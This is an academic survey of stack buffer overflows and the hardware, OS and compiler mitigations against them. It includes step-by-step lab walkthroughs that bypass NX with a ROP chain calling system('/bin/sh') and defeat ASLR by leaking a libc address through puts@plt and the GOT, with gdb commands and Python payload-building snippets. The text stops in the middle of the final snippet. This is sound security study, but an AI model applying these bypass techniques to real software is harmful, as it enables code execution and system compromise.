An In-Depth Survey of Bypassing Buffer Overflow Mitigation Techniques

Abstract: Buffer Overflow (BOF) has been a ubiquitous security vulnerability for more than three decades, potentially compromising any software application or system. The vulnerability occurs when a program writes more bytes of data into a buffer than the buffer can hold. To date, this primitive flaw has been used to attack many different software systems. The most common type of buffer overflow is the stack overflow, through which an adversary can execute shellcode and gain admin privileges remotely. Numerous mitigation techniques have been proposed and deployed at the hardware, operating system, and compiler levels to reduce the likelihood of BOF attacks, but attackers still manage to bypass them. These techniques include No-EXecute (NX) and Address Space Layout Randomization (ASLR). The NX bit prevents the execution of malicious code by marking portions of the address space of a process as non-executable. ASLR randomly assigns addresses to the various parts of the logical address space of a process as it is loaded into memory for execution. Position Independent Executable (PIE) combined with ASLR provides more robust protection by also randomizing the addresses of the binary's own segments. Read-only relocation (RELRO) protects the Global Offset Table (GOT) from overwriting attacks. StackGuard protects the stack by placing a canary before the return address in order to detect stack smashing attacks. Despite all the mitigation techniques in place, attackers continue to bypass them, making buffer overflow a persistent vulnerability. The current work describes the stack-based buffer overflow vulnerability and reviews in detail the mitigation techniques reported in the literature as well as how attackers attempt to bypass them.


Introduction
Computing systems today depend heavily on ever-evolving hardware infrastructure and on the Internet, and as a result code is becoming increasingly complex. This growing complexity usually results in vulnerabilities [1]. These vulnerabilities may go unnoticed for years and may cause significant damage. Programmers tend to make mistakes or build on other programmers' mistakes due to a lack of time, a lack of awareness, and dependence on old code [2]. Numerous types of software vulnerabilities have been reported and exploited, including SQL injection, cross-site scripting, buffer overflow, race conditions, integer overflow, OS command injection, missing authentication, and path traversal [3]. Even the slightest vulnerability in software can lead to financial, intellectual, or data loss. For instance, an attack carried out through the SWIFT network cost Bangladesh's central bank 81 million USD [4]. The Home Depot data breach in 2014 exposed the information of 56 million credit and debit cards [5]. The Equifax data breach affected approximately 147 million individuals in 2017 [6]. These attacks and the related research suggest that such vulnerabilities may lead to data loss, financial loss, and in some cases even death. This study focuses on buffer overflow (BOF), a vulnerability that is more than thirty years old yet still causes the most security breaches among all existing vulnerabilities.
To date, buffer overflow has been identified as the most common and dangerous security breach. Cowan named it the "vulnerability of the decade" (1988-1998), because it was the leading cause of security breaches following its discovery [7]. According to the Common Vulnerabilities and Exposures (CVE) list of 2019, it was the most frequently reported vulnerability, with more than 400 reported vulnerabilities [8]. As of May 2021, the number of reported buffer overflow vulnerabilities in the CVE database had reached over 13,700 [9]. Figure 1 illustrates the CVE statistics of buffer overflow vulnerabilities, showing an apparent increase in vulnerabilities over time. A number of security breaches have resulted from buffer overflow vulnerabilities; Tables 1 and 2 list a few of the most prominent attacks.

Stack Based Buffer Overflow
An attack using a stack overflow is the most common type of BOF, which corrupts the function stack frame (FSF) or function activation record. A clear understanding of stack-based buffer overflows requires clarification of the basics of process address space and the layout of a stack as they relate to stack buffers.

Process Stack
In x86-64, the code section starts at address 0x0400000, followed by the initialized and uninitialized data sections, and above those lies the heap, which is used for run-time memory allocation. In architectures like x86-64 and MIPS the stack grows towards lower addresses (Aleph 1996), starting from 0x080000000000, and is used to hold function activation records [10]. Figure 2 shows the x86-64 Function Stack Frame (FSF), with registers rbp and rsp pointing to the base and the top of the active FSF, respectively. For x86-64 running a UNIX-based OS, the first six integer arguments and the first eight floating-point arguments are passed via registers, and any remaining arguments are pushed on the stack. For x86-64 running Microsoft Windows, the first four integer arguments are passed via registers and any remaining arguments are pushed on the stack. After the function arguments, the return address and the contents of the rbp register are pushed on the stack, followed by the space for the local variables of that function. On the x86-64 architecture, once control is transferred to the callee, it performs the procedure prolog, which grows the process stack and creates the FSF. The last two assembly instructions of the function form the procedure epilog, which is responsible for unwinding the stack [10]. Figure 3 contains a basic C program with a BOF vulnerability, and Figure 4 displays the structure of the copy_buff() function with the procedure prolog and epilog highlighted.
Across the x86-64 and MIPS instruction sets and a wide range of programming languages, the FSF is used to store the return address during a procedure call, and this address can easily be overwritten by a BOF attack [11]. Changing the return address is therefore the most common method of launching BOF attacks. The C and C++ programming languages are inherently unsafe and vulnerable to buffer overflow because they do not provide low-level security measures, such as automatic bounds checking, and they allow direct manipulation of data and memory. Numerous C library functions are vulnerable to BOFs, including gets(), strcmp(), strcpy(), scanf(), and memcpy() [12]. Figure 5 illustrates pictorially how writing additional bytes into a buffer of size 10 causes a buffer overflow.
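The effect of such an unchecked write can be sketched with a toy model in Python. The layout used here (a 10-byte buffer followed directly by the saved rbp and the return address) is a simplifying assumption that ignores compiler padding and alignment; the helper names and all addresses are hypothetical.

```python
import struct

BUF_SIZE = 10  # size of the local buffer, as in the example above


def make_frame(saved_rbp: int, return_addr: int) -> bytearray:
    """Lay out buffer, saved rbp, and return address at increasing addresses."""
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<QQ", saved_rbp, return_addr))


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Mimic an unbounded copy: write every input byte, starting at the buffer."""
    frame[0:len(data)] = data


def read_return_addr(frame: bytearray) -> int:
    """Read the 8-byte return address stored after the buffer and saved rbp."""
    return struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]


frame = make_frame(saved_rbp=0x7FFD00001000, return_addr=0x401136)  # hypothetical values
unchecked_copy(frame, b"A" * 9)    # fits inside the buffer
print(hex(read_return_addr(frame)))
unchecked_copy(frame, b"A" * 26)   # 10 buffer bytes + 8 saved rbp + 8 return address
print(hex(read_return_addr(frame)))
```

In this model the return address is intact after the 9-byte input and consists entirely of 0x41 bytes after the 26-byte input, which is the corruption that a real overflow exploits.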

Stack Smashing
Stack smashing is the most common strategy used by attackers to exploit local buffers created in stack memory and cause a stack overflow. It requires a vulnerable program and the injection of malicious code into that program's address space. Attackers can exploit the BOF vulnerability by knowing the stack layout and overwriting the return address of the current FSF with a location containing malicious code. The attacker can gain complete access to the victim machine through a code-injection attack, which injects malicious code into the vulnerable application [13]. The injected code runs with the vulnerable application's privileges, and with sufficient privileges the attacker can gain remote access to the host machine. Conventionally, the attacker uses code injection to obtain a remote shell on the target system; such malicious code is therefore also called shellcode. Figure 6 shows how an attacker can give a well-crafted string as input to the program, causing the code injection attack. The critical point in designing the input string is to place the starting address of the injected shellcode at the specific location where it exactly overwrites the saved function return address inside the FSF [14].
Table 3 reflects the contributions of the current study. In the first phase, research data published since 1989 was collected, including journal articles, conference papers, webpages, and public databases. In the second phase, all studies were compared against selected benchmarks covering all major aspects of BOF attacks. This research also highlights the most prominent BOF attacks and vulnerabilities and the common mitigation techniques at the hardware, operating system, and compiler levels. It also covers the most common forms of BOF attack, including code injection, code reuse, Return-oriented Programming (ROP), and memory leaks.
The rest of the paper is organized in the following way: Section 2 discusses the hardware-based mitigation techniques and the strategies used to bypass them. Similarly, Sections 3 and 4 present the survey of Software-based and Compiler-based mitigation techniques and their bypassing strategies, respectively. Section 5 concludes this study. To practically launch a BOF attack and bypass different preventive mechanisms, we use x86-64 architecture with Kali Linux-2020 with kernel version 5.9.0 and Ubuntu 18.04.1-desktop with Kernel version 5.4.0-72 as guest operating systems. We used two different hypervisors, Oracle VM VirtualBox 6.0.16 for Kali Linux and VMWare Workstation 16 player for Ubuntu, respectively.

Threats to Validity
This study selected the most common and most cited articles related to stack-based buffer overflow attacks. Only approaches that had been implemented were selected, so that their penetration could be compared. The study covers the literature only up to the year 2021, so any later approach is excluded. It covers only the major hardware-based and operating-system-based approaches; other solutions are excluded from this research.

Hardware-Based Mitigation Techniques
Buffer overflow attacks are launched by altering the saved return address in the FSF of the called function, which redirects execution to arbitrary code injected by the attacker. Different hardware-based approaches for protecting the saved return address on the stack have been proposed; they are summarized in Table 4. Ref. [15] introduced Smashguard, a hardware stack implemented in the CPU to protect the return address, which was first implemented on the Alpha architecture. Each time a function is called, the return address is pushed on the process stack in memory and also saved in the hardware stack. When a function returns, both saved return addresses are popped and compared. If the two addresses are not the same, the CPU throws an exception and the process is terminated. Ref. [16] introduced a similar approach called Secure Return Address Stack (SRAS), which was first implemented on the Alpha 21264 processor. When a function is called, the return address is pushed on the SRAS, and the program counter (PC) is set to the target of the call instruction. When a function returns, the processor compares the return address from stack memory with the return address from the SRAS. If the addresses are not identical, the process is terminated. Ref. [17] introduced another hardware-based protection mechanism, namely the idea of running untrusted software on a trusted hardware architecture called XOM (eXecute Only Memory). The XOM architecture assigns cryptographic keys to each compartment (logical container) of a process. The XOM key table stores the hashes of encrypted data along with their cryptographic keys, which are later used to protect and verify the actual information. Ref. [18] introduced another architectural approach called Secure Bit to protect control data such as the return address. If the secure bit is set for a particular piece of data, that data is marked as untrustworthy and is not used as control data [19]. An additional mode named sbit_write is introduced to manage the secure bit. Ref. [20] introduced HSDefender (Hardware/Software Defender) to protect against buffer overflow attacks, and it was first implemented on an ARM processor. It was mainly designed to protect embedded systems by providing a secure call instruction. HSDefender combines protection and checking, which makes this method more secure. The No-Execute (NX) bit is another hardware-based technique; it was first implemented in AMD64 processors (Athlon64, Opteron) as their protection policy [21]. The rest of this section focuses on how the NX bit protects against stack-based buffer overflows and on the exploitation mechanisms that can be used to perform a BOF attack with the NX bit in place.
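The compare-on-return idea shared by Smashguard and SRAS can be sketched as a small software model. This is only an illustration of the principle, not the hardware design from [15] or [16]; the class and method names are hypothetical.

```python
class ReturnAddressMismatch(Exception):
    """Raised when the in-memory return address differs from the protected copy."""


class ShadowStackCPU:
    def __init__(self) -> None:
        self.memory_stack = []    # models the process stack, writable by a BOF
        self.hardware_stack = []  # models the protected copy kept inside the CPU

    def call(self, return_addr: int) -> None:
        """On a call, save the return address in both places."""
        self.memory_stack.append(return_addr)
        self.hardware_stack.append(return_addr)

    def ret(self) -> int:
        """On a return, pop both copies and refuse to continue if they differ."""
        from_memory = self.memory_stack.pop()
        from_hardware = self.hardware_stack.pop()
        if from_memory != from_hardware:
            raise ReturnAddressMismatch(hex(from_memory))
        return from_memory


cpu = ShadowStackCPU()
cpu.call(0x401136)                        # hypothetical return address
cpu.memory_stack[-1] = 0x4141414141414141  # simulate an overflow of the in-memory copy
try:
    cpu.ret()
except ReturnAddressMismatch as exc:
    print("process terminated, corrupted return address:", exc)
```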

NX Bit
The Von Neumann architecture, a design used in all mainstream microprocessors, allows the same memory space to store both code and data. Memory protection is implemented through paging, which traditionally did not permit read, write, and execute permissions to be set independently on a specific memory region. Only the following three options were available for the access permissions of a region: non-accessible, readable-executable (RX), and readable-writeable-executable (RWX). Consequently, if the read bit is set, the page is also executable, and this is the main reason that code-injection attacks are possible [22]. The NX bit was introduced in hardware to remove execute permission from memory regions containing data. With the support of the NX bit, operating systems can mark certain memory areas (heap, stack) as non-executable.
Different architectures use different names for features similar to the NX bit. AMD first introduced the NX bit in its AMD64 processors (Athlon64, Opteron) for the x86 architecture. It allows execution to be controlled per page rather than per segment by adding a new bit to the page table entry [23]. Intel included a similar feature, XD (execute disable), in x86 Pentium 4 processors [24]. A new page table entry (PTE) format that included the XN (execute never) bit was introduced in ARMv6. Andi Kleen first introduced NX support in Linux kernel 2.6.8 in 2004 for 64-bit CPUs [25]. NX support is present in Ubuntu 9.10 and all later versions. Mac OS X 10.4.4 and later versions support the NX bit on all Apple-supported processors. In the Windows operating system, it was first implemented in Windows XP Service Pack 2 and Windows Server 2003. The Windows implementation of NX is called Data Execution Prevention (DEP) [26].
Operating system support is required to benefit from the hardware-supported NX bit, because the page table is an operating system entity. The NX bit is bit number 63 (counting from zero), the most significant bit of a page table entry. Code on a page can be executed if the NX bit of that page is set to zero (0); if it is set to one (1), the page is non-executable and contains data only. On x86 the NX feature is available in 64-bit mode and, on 32-bit systems, only when PAE paging is used. An important property of the NX feature is that it works at run time: programs do not need to be recompiled to benefit from it. Operating systems use the NX bit to mark stack and heap memory as non-executable, thus preventing a considerable portion of the code injection attacks that exploit buffer overflows. Figure 7 illustrates the NX bit in the x86-64 page table entry [27].
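The role of bit 63 can be illustrated with a few lines of bit arithmetic. The sketch below treats a page table entry as a plain 64-bit integer; the helper names and the example frame address are hypothetical, and only the present, writable, and NX bits are modeled.

```python
PRESENT = 1 << 0    # bit 0: page is present in memory
WRITABLE = 1 << 1   # bit 1: page is writable
NX_BIT = 1 << 63    # bit 63: no-execute


def is_executable(pte: int) -> bool:
    """A present page is executable only when its NX bit is clear."""
    return bool(pte & PRESENT) and not (pte & NX_BIT)


def mark_non_executable(pte: int) -> int:
    """Return the entry with the NX bit set, as an OS would do for stack or heap pages."""
    return pte | NX_BIT


stack_pte = 0x1234000 | PRESENT | WRITABLE  # hypothetical entry for a stack page
print(is_executable(stack_pte))                       # NX clear
print(is_executable(mark_non_executable(stack_pte)))  # NX set
```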

Exploiting the NX Bit Mitigation Technique
The NX bit has stopped a considerable portion of BOF attacks by preventing code injection. Adversaries have therefore adopted another strategy, the code-reuse attack [28], in which the attacker uses code that already exists in the process address space instead of injecting malicious code. Return-to-libc is one of the best-known code-reuse techniques: the attacker exploits the program vulnerability to overwrite the return address with a pointer to a libc function. The standard C library is linked to programs written in C on almost all operating systems. The basic idea behind a return-to-libc attack is to redirect the target application's control flow to the system() library function, which internally calls the execve() system call. The system() function is invoked with attacker-supplied arguments such as "/bin/sh" to obtain a shell on the victim machine [29]. Although quite successful in many environments, return-to-libc attacks suffer from the following limitations:

1. On 32-bit x86 machines, the attacker can control function arguments because they are pushed on the stack. On 64-bit machines, however, function arguments are passed via registers, so a plain return-to-libc attack does not work.
2. The attacker can only use functions present in the program's code segment or in the library's code, which limits the attack's functionality.
3. The arguments passed by the attacker might need to contain NULL bytes. However, if the buffer overflow is caused by a function like strcpy(), which stops copying when it encounters a NULL byte, the return-to-libc payload cannot carry NULL bytes in the middle.
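The third limitation can be made concrete with a short simulation. The function strcpy_like below is a hypothetical stand-in that returns the bytes a NULL-terminated copy would transfer, and the address is invented for illustration.

```python
import struct


def strcpy_like(src: bytes) -> bytes:
    """Return the non-NULL bytes that a strcpy()-style copy would transfer."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]


# A typical 64-bit user-space address has zero bytes in its two most significant positions.
address = struct.pack("<Q", 0x00007FFFF7E12345)  # hypothetical libc address
payload = b"A" * 22 + address + b"B" * 8          # filler, first pointer, further data

copied = strcpy_like(payload)
print(len(payload), len(copied))
```

In this sketch only the filler and the six low-order bytes of the first address are copied; everything placed after the first NULL byte is lost.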

Return-Oriented Programming (ROP)
Return-oriented programming (ROP) is an advanced form of code-reuse attack that permits code execution in the presence of the NX bit and does not suffer from the limitations of return-to-libc attacks mentioned above. It was first presented by Shacham in 2007 as a technique in which attackers chain together existing code instead of injecting their own to exploit a buffer overflow [30]; the technique later became known as Return-oriented programming (ROP). Attackers inject malicious data in the form of code pointers instead of injecting shellcode [31].
ROP uses small pre-existing instruction sequences named "gadgets" instead of complete functions to overcome the limitations of the return-to-libc attack. Gadgets are short instruction sequences that are combined to perform different high-level tasks [32]. With ROP there is no need to call a function at all; only short instruction sequences (two or three instructions) are used, which have neither a procedure prolog nor an epilog. Although ROP attacks have been launched on various architectures, including SPARC, PowerPC, and ARM [33], Intel x86 is the most likely target of ROP attacks because of its variable-length CISC instruction set. Because of this property, it is quite easy to find instruction sequences that can serve as gadgets in the body of x86 executable code. A gadget must be a valid instruction sequence that ends with a return instruction, which causes the CPU to carry on to the next gadget or payload. Generally, when launching an attack, the attacker overwrites the saved return address on the stack with a code pointer that jumps to the first gadget. Figure 8 gives a general idea of a ROP attack that is used to obtain a shell on the victim machine. First, the attacker sends a specific number of A's and then overwrites the function return address with a code pointer to the first gadget. When the callee executes the return instruction, control flow is redirected to the first gadget and the stack pointer is increased by eight (on a 64-bit machine), so that it points to the value now at the top of the stack, which in our case is the address of "/bin/sh". The first instruction of the first gadget then executes: the pop rdi instruction pops the value from the top of the stack (the address of "/bin/sh"), places it in the rdi register, and increases the stack pointer by eight. The ret instruction then redirects control flow to the second gadget by reading the next code pointer, which points to the system() function. When system() executes, it reads its first argument from the rdi register, which holds the address of "/bin/sh", and thus spawns a new shell. The following section explains the practical implementation of this strategy to obtain a shell.
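The control flow described above can be traced with a toy interpreter that models only the stack pointer, the rdi register, and two code locations. It executes nothing real: the addresses are hypothetical and the function run_chain is an illustrative model, not a tool used in this study.

```python
# Hypothetical addresses of the two code locations and the string.
POP_RDI_RET = 0x401203      # gadget: pop rdi; ret
SYSTEM = 0x7FFFF7E18410     # entry point of system()
BIN_SH = 0x7FFFF7F7A5AA     # address of the string "/bin/sh"


def run_chain(stack_words):
    """Walk the overwritten stack, one 8-byte word at a time."""
    regs = {"rdi": 0}
    calls = []
    sp = 0

    def pop():
        nonlocal sp
        value = stack_words[sp]
        sp += 1  # models rsp += 8
        return value

    rip = pop()  # ret of the vulnerable function loads the first code pointer
    while True:
        if rip == POP_RDI_RET:
            regs["rdi"] = pop()  # pop rdi: take the next word as the argument
            rip = pop()          # ret: take the next word as the next code pointer
        elif rip == SYSTEM:
            calls.append(("system", regs["rdi"]))  # system() reads its argument from rdi
            return calls
        else:
            raise ValueError(f"no gadget modeled at {rip:#x}")


print(run_chain([POP_RDI_RET, BIN_SH, SYSTEM]))
```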

Step by Step Procedure of Bypassing NX Bit Mitigation
An attacker cannot launch stack-based buffer overflow attacks with standard code-injection techniques when NX is present. With the help of ROP [34], however, a stack overflow can still be exploited with the NX bit enabled. Figure 9 shows the flow of the strategy that we have used to bypass the NX bit.

Phase 1:
Figure 10 shows the sample C program with a BOF vulnerability, which reads input from the user and copies it into a temporary buffer. As shown in Figure 11, the vulnerable program is compiled with all protection mechanisms other than the NX bit disabled. Address Space Layout Randomization (ASLR) is also disabled by writing zero (0) to the randomize_va_space file in the /proc/sys/kernel directory.
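The current ASLR setting can also be inspected programmatically. The following sketch reads the same file and maps the values 0, 1, and 2 to a short description based on the Linux kernel documentation; the function names are hypothetical, and the script only reads the setting (changing it requires root privileges).

```python
from pathlib import Path

ASLR_SETTING = Path("/proc/sys/kernel/randomize_va_space")

ASLR_MODES = {
    0: "disabled",
    1: "partial: stack, mmap base, and VDSO are randomized",
    2: "full: as in 1, plus the heap (brk) is randomized",
}


def describe_aslr(raw_value: str) -> str:
    """Translate the content of randomize_va_space into a description."""
    return ASLR_MODES.get(int(raw_value.strip()), "unknown setting")


def current_aslr_mode(path: Path = ASLR_SETTING) -> str:
    """Read the setting; fall back gracefully on systems without this file."""
    try:
        return describe_aslr(path.read_text())
    except OSError:
        return "setting not available on this system"


print(current_aslr_mode())
```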

Phase 2:
The second step is the preparation of the payload that is passed as input to the executable. The payload here consists of three ROP elements. We first load the vulnerable program in gdb with peda. The address of the first gadget, "pop rdi; ret", can be found using the asmsearch command of gdb-peda. The address of the second element, system(), can be found using the print command of gdb, which prints the address of system() inside libc. Finally, to get the address of "/bin/sh", we first need to find the starting and ending addresses of libc in gdb using the info proc map command. With those addresses, we can locate "/bin/sh" within that range using the searchmem command. Figure 12 shows the summary of phase 2.

Phase 3:
We now have all the addresses required to create the payload in Python. Figure 13 shows the crafted Python script containing all the gadget addresses. To calculate the number of bytes after which the return address is saved, we used the pattern_create and pattern_offset commands of gdb-peda, which show that the saved return address is at an offset of 22 bytes. Thus, at line 5 in Figure 13, we place 22 A's followed by the addresses of the ROP gadgets. When the Python script shown in Figure 13 is executed, it generates the payload, which spawns a shell when passed to the vulnerable program, as shown in Figure 13.
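The byte layout of such a payload can be sketched as follows. This is not the script from Figure 13: the function build_payload and the three addresses are hypothetical placeholders, and only the 22-byte offset is taken from the text.

```python
import struct

OFFSET_TO_RETURN_ADDRESS = 22  # offset reported by pattern_offset in the text


def build_payload(pop_rdi_ret: int, bin_sh: int, system: int) -> bytes:
    """Filler up to the saved return address, then three little-endian 64-bit words."""
    filler = b"A" * OFFSET_TO_RETURN_ADDRESS
    chain = struct.pack("<QQQ", pop_rdi_ret, bin_sh, system)
    return filler + chain


# Placeholder addresses; real values come from gdb as described in phase 2.
payload = build_payload(0x401203, 0x7FFFF7F7A5AA, 0x7FFFF7E18410)
print(len(payload), payload[OFFSET_TO_RETURN_ADDRESS:].hex())
```

The order of the three words matters: the gadget address lands on the saved return address, the string address is the word that pop rdi consumes, and the address of system() is the word that the gadget's ret consumes.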

OS-Based Mitigation Techniques
The previous section shows that the NX bit can be bypassed using advanced methodologies such as Return-oriented programming, which means that the NX feature alone is not enough to prevent BOF and other memory corruption attacks. Several other protection strategies are required to secure computing systems. In past years, modifications have been made at the software or operating system level to provide various security mechanisms. Table 5 summarizes those security mechanisms. Ref. [30] proposed a library modification approach named libsafe, a dynamically loadable library that invokes safer versions of functions like strcpy(), strcat(), gets(), and scanf(). Its limitation is that it protects only dynamically linked programs and only a subset of the unsafe functions. Necula et al. presented another method, Proof-carrying code (PCC) [35]. It is a special binary that is produced according to the safety policy provided by the code consumer and contains an encoded formal proof showing that the binary complies with the consumer's safety rules [36]. Ref. [37] proposed the Program shepherding technique, which monitors control flow transfers. It verifies each branch against a given security policy, restricts the locations from which code may execute, and determines the locations in memory to which control may transfer. Ref. [38] presented Address obfuscation, which randomizes the addresses of the target application's code and data sections as well as the relative distances between variables and individual data items. It reduces the probability of successful attacks by making the memory layout hard to predict. Ref. [39] presented the Binary stirring (STIR) technique, which gives x86 code the ability to reorganize its own instruction addresses every time it is launched. It takes only the binary of the application as input and outputs a new binary whose addresses are determined at load time. Ref. [40] presented Marlin, a randomization method that rearranges the code blocks in the text section of the program's binary whenever it is executed. It makes exploitation difficult for attacks like ROP because shuffling changes the gadget sequences, so that they are no longer useful to attackers. Address Space Layout Randomization (ASLR) is another OS-based technique; it was first designed and implemented as a patch for the Linux kernel [41]. The rest of this section describes how ASLR protects against stack-based buffer overflows and the exploitation mechanisms that can be used to perform a BOF attack with ASLR enabled.

Address Space Layout Randomization
To bypass the NX bit mitigation technique we used ROP, for which the addresses of the ROP gadgets must be known. ASLR randomizes the base addresses of various sections of the process, including the stack, heap, shared libraries, and executables [42]. The attacker therefore cannot reuse the same exploit every time against the same vulnerable program, but has to prepare a specific payload for every randomized instance of the program.
ASLR is among the first protection mechanisms to be implemented in almost all major operating systems. It was first designed and implemented as a patch for the Linux kernel in July 2001 by the Linux PaX project. In June 2005, Linux kernel version 2.6.12 enabled ASLR by default [43]. OpenBSD version 3.4 was the first operating system to introduce default support for ASLR, in 2003. In March 2011, it was introduced in iOS 4.3. Mac OS X Leopard 10.5 started implementing ASLR for system libraries in 2007 and extended it to cover all applications in 2011. Microsoft Windows Vista and its subsequent versions also support ASLR. Many years later, ASLR is still an effective approach to protecting against modern attacks. It is an active research area, and there is still a lot to do regarding its design and implementation. It has multiple implementations that differ in their operation and effectiveness [44]. Recently, a novel approach named ASLR-NG (ASLR Next Generation) has also been presented to overcome the weaknesses of traditional ASLR [42].
On 32-bit systems, only 16 bits are effectively available for randomization (or 8 bits on Linux systems, giving only 256 possible values). This is a limitation of ASLR on 32-bit systems, because 16 bits of entropy can be defeated in a few milliseconds using a brute force attack [45]. A 64-bit machine provides 40 bits for randomization, which makes a brute force attack almost impossible because the large number of failed attempts would be easily noticed. The limitation of ASLR on 64-bit systems is that it is vulnerable to memory disclosure and information leakage attacks. The attacker can launch a ROP attack after revealing a single function address through an information leak [46]. The following section describes an existing strategy of this kind for breaking ASLR protection.
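The gap between these entropy values is easy to quantify. The sketch below counts the possible layouts for a given number of random bits and the average number of guesses needed, under the assumption that the layout stays fixed between attempts (for example, a server that forks without re-randomizing); the function names are hypothetical.

```python
def possible_layouts(entropy_bits: int) -> int:
    """Number of distinct base addresses for the given number of random bits."""
    return 2 ** entropy_bits


def expected_guesses(entropy_bits: int) -> float:
    """Average guesses to hit a fixed layout when no guess is repeated: (N + 1) / 2."""
    return (possible_layouts(entropy_bits) + 1) / 2


for bits in (8, 16, 40):
    print(bits, possible_layouts(bits), expected_guesses(bits))

# Going from 16 to 40 bits multiplies the search space by 2**24.
print(possible_layouts(40) // possible_layouts(16))
```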

Exploiting the ASLR Mitigation Technique
Address Space Layout Randomization is a protection mechanism used to mitigate buffer overflow attacks. It makes it difficult for attackers to know the exact location of the target code. For example, the attacker cannot launch a return-to-libc attack because it requires the base address of libc [47]. However, ASLR is not entirely foolproof and can be bypassed using various techniques such as brute force, return-to-plt, or information leakage. In the following section, we discuss an existing methodology based on information leakage to bypass ASLR. We chose an information leak because information leakage attacks are more effective than other techniques for bypassing address space randomization [44]. We leak the Procedure Linkage Table (PLT) and Global Offset Table (GOT) addresses of some functions to launch the attack.
The Procedure Linkage Table (PLT) is a data structure of jump stubs used to call external functions whose addresses are not known at link time and are resolved at run time by the dynamic linker [48]. The Global Offset Table (GOT) is an array that holds the absolute addresses of the global variables and library functions currently used by the process. The ith entry in the PLT contains a jump instruction to the address saved in the ith entry of the GOT. This can be understood with the help of Figure 14, which shows how a call to func@plt in C code leads to the PLT entry. Inside the PLT, an indirect jump is made through the address stored in the GOT. On the first call, the GOT entry leads to the dynamic linker, which resolves the symbol and transfers control to the actual code in libc. By learning the absolute address of a single function, the adversary is able to launch a successful attack. We therefore exploit the PLT and GOT to obtain the address of a single function residing in libc and launch the attack.
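The interplay between the PLT stub, the GOT entry, and the dynamic linker can be modeled in a few lines. This is a simplified sketch of lazy binding, not a description of any particular linker; the class, its methods, and the libc address are hypothetical.

```python
LIBC_SYMBOLS = {"puts": 0x7FFFF7E4A5A0}  # hypothetical run-time address inside libc
UNRESOLVED = "dynamic-linker-stub"       # marker for a GOT entry not yet resolved


class LazyBoundProcess:
    def __init__(self) -> None:
        self.got = {"puts": UNRESOLVED}  # before the first call
        self.resolver_calls = 0

    def _resolve(self, name: str) -> int:
        """Model of the dynamic linker: look up the symbol and patch the GOT."""
        self.resolver_calls += 1
        self.got[name] = LIBC_SYMBOLS[name]
        return self.got[name]

    def call_via_plt(self, name: str) -> int:
        """Model of a PLT stub: jump indirectly through the GOT entry."""
        target = self.got[name]
        if target == UNRESOLVED:
            target = self._resolve(name)
        return target  # address at which execution continues


proc = LazyBoundProcess()
print(hex(proc.call_via_plt("puts")), proc.resolver_calls)  # first call resolves
print(hex(proc.call_via_plt("puts")), proc.resolver_calls)  # later calls reuse the GOT
```

After the first call the GOT holds the absolute libc address of puts, which is exactly the value an information leak aims to read.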

Step by Step Procedure of Bypassing ASLR Mitigation
Figure 15 shows the flow of the strategy that we have used to bypass ASLR.

Phase 1:
Figure 16 shows a vulnerable C program that consists of a function getMessage() called by the main() function. After declaring a character buffer of 200 bytes, it takes input from the user via the scanf() function. Since scanf() performs no bounds check here, it accepts input until it encounters a white-space or newline character. Hence, the program has a buffer overflow vulnerability, and this vulnerability can be used to bypass ASLR.
First, the vulnerable program is compiled with the other protection mechanisms disabled, as detailed in Section 3.2.2 (Steps to bypass NX bit mitigation). Address Space Layout Randomization (ASLR) is enabled by writing two (2) to the randomize_va_space file, which means that the process address space is fully randomized. Checksec can be used to identify which mitigation techniques are enabled and which are disabled, as shown in Figure 17.
Phase 2:
The next step is the preparation of the exploit payload, which consists of two stages. In the first stage, information is leaked through the GOT. To do so, we first determine the PLT address of any available function in the program that can be used to print addresses from the GOT. By loading the binary in gdb and using the info functions command, as shown in Figure 18, we find puts@plt, the stub for the puts function, which is resolved in libc by the dynamic linker (ld.so). After getting the PLT address of puts, we can easily find its GOT address by disassembling the PLT entry, as shown in Figure 18. To place that address in the rdi register, we need the pop rdi; ret gadget that we located in the previous section. After all the addresses are placed in the payload, the script leaks the GOT information; however, the program crashes every time after it leaks the information. When the script is rerun after a crash, everything is randomized again. It is therefore imperative to keep the program running during the second stage of the exploit, so that the leaked addresses can be used. One way to do this is to restart the program without letting it die by returning to _start, whose address can simply be printed in gdb, as shown in Figure 18.
We now have all the addresses required to create the payload in Python. Figure 19 shows the crafted Python script containing all the addresses required for stage 1. To calculate the number of bytes after which the return address is saved, we used the pattern_create and pattern_offset commands of gdb-peda, which show that the saved return address is at an offset of 216 bytes. Thus, at line 1 in Figure 19, we place 216 A's followed by all the addresses. When the Python script shown in Figure 19 is executed, it leaks the address of the puts function in libc as randomized by ASLR.
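The bytes printed by puts have to be converted back into a 64-bit address before they can be used. The helper below is a hypothetical sketch of that step: puts stops at the first NULL byte and appends a newline, so a typical leak is six address bytes followed by a newline. It assumes the output contains exactly one leaked pointer.

```python
import struct


def decode_leak(raw: bytes) -> int:
    """Turn the raw output of puts(<GOT entry>) into an integer address."""
    leaked = raw[:-1] if raw.endswith(b"\n") else raw  # drop the newline added by puts
    padded = leaked[:8].ljust(8, b"\x00")              # restore the truncated zero bytes
    return struct.unpack("<Q", padded)[0]


example_output = b"\xa0\xa5\xe4\xf7\xff\x7f\n"  # hypothetical bytes received from the program
print(hex(decode_leak(example_output)))
```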

Phase 3:
In the second stage of exploit preparation, we use the leaked information to obtain the exact address of libc, which is then used to locate system() and the /bin/sh string needed by the ROP chain to spawn a shell. The first step in the second stage is to find the offsets of puts, system(), and /bin/sh in libc, which can be done using the readelf and strings commands, as shown in Figure 20. The final step is to determine how much randomization ASLR has applied. Since we already obtained a leaked puts address in stage 1 (Phase 2), we can subtract the puts offset from it to find the difference, which reveals how far ASLR has shifted the address space, as highlighted at line 2 in Figure 21. Using that difference, we can locate the required addresses in the randomized address space: adding the difference to the values of system() and /bin/sh found earlier gives their actual randomized addresses, as highlighted at lines 5 and 6 in Figure 21. Finally, executing the payload spawns a shell, as shown in Figure 21.
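The arithmetic of this stage can be illustrated with a minimal sketch. The three libc offsets and the sample leak below are hypothetical values chosen for the example; in practice they would come from readelf, strings, and the running process.

```python
import struct

# Hypothetical libc offsets (assumptions, not the values of Figure 20).
PUTS_OFFSET = 0x809c0
SYSTEM_OFFSET = 0x4f440
BINSH_OFFSET = 0x1b3e9a

def parse_leak(raw):
    """Convert the bytes printed by puts (address bytes plus newline) to an integer."""
    if raw.endswith(b"\n"):
        raw = raw[:-1]
    # puts stops at the first NUL byte, so the upper zero bytes must be padded back.
    return struct.unpack("<Q", raw[:8].ljust(8, b"\x00"))[0]

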